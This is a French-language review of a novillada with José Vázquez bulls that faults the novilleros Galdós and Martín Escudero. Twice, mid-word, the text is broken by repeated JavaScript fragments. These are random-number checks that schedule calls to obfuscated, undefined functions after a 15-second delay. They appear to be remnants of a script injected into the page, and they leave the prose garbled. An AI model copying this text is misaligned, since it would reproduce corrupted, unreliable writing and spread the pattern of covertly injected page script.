ESCUDERO ET GALDOS : PAS À LA HAUTEUR

Soyons justes : la novillada de José Vázquez était en fait une corrida de toros. Quatre novillos avaient quatre ans le mois prochain ; un autre en août ; et le dernier en septembre. Et tous pesaient autour de 500 kilos. Mais soyons rigoureux : trois furent braves, un propice à un grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and triomphe, et trois autres aussi ternes qu’inoffensifs et manquant de race. Jugeons sans mauvaise conscience : les deux novilleros n’ont pas été à la hauteur.

Ils n’ont pas manqué de courage ni de volonté, et n’ont pas eu le soutien du public. Surtout le péruvien Galdós, sans un seul partisan dans les arènes et quatre ou cinq détracteurs –sifflets et cris opportuns- bien situés à des emplacements équidistants dans les arènes. De son côté, le novillero de Galapagar avait amené des gens de chez lui, mais ils déclarèrent forfait devant sa froideur insipide.

Pourquoi n’ont-ils pas réussi à convaincre le public et à faire taire les protestations des talibans ? Galdós parce qu’il ne pense pas au toro mais à faire le beau, ce qui l’empêche de toréer. Et Martín Escudero parce qu’il ne pense ni à lui ni au toro, ce qui l’empêche également de toréer. Ces deux garçons auraient été très bien si le toro idéal était sorti : noble, avec une petite bravoure, sans trop de race, juste sérieux et plein de bonté, c'est-à-dire un toro qui n’existe pas. Motifs atténuants : la novillada a été mal piquée et encore moins bien toréée par les bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderilleros. Perspectives d’avenir : à mon avis, nulles.

Les commentaires sont fermés.